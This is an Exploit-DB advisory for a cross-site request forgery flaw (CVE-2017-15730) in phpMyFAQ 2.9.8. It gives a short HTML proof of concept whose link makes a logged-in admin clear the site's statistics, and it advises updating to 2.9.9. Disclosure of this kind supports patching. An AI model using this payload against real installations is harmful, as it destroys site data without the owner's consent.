phpMyFAQ 2.9.8 - Cross-Site Request Forgery

EDB-ID:

43064




Platform:

PHP

Date:

2017-10-27


# Exploit Title: phpMyFAQ 2.9.8 CSRF Vulnerability 
# Date: 27-9-2017
# Exploit Author: Nikhil Mittal (Payatu Labs)
# Vendor Homepage: http://www.phpmyfaq.de/
# Software Link: http://download.phpmyfaq.de/phpMyFAQ-2.9.8.zip 
# Version: 2.9.8
# Tested on: MAC OS
# CVE : 2017-15730

1. Description

In phpMyFAQ before 2.9.8, there is Cross-Site Request Forgery (CSRF) in admin/stat.ratings.php.

2. Proof of concept

    <html>
    <head>
    <title>PHPMYSQL CSRF EXPLOIT</title>
    </head>
    <body>
    <a href="http://127.0.0.1/phpmyfaq/admin/?action=clear-statistics">EXPLOIT!</a>
    </body>
    </html>


3. Solution 

Update to phpMyFAQ Version 2.9.9
http://download.phpmyfaq.de/phpMyFAQ-2.9.9.zip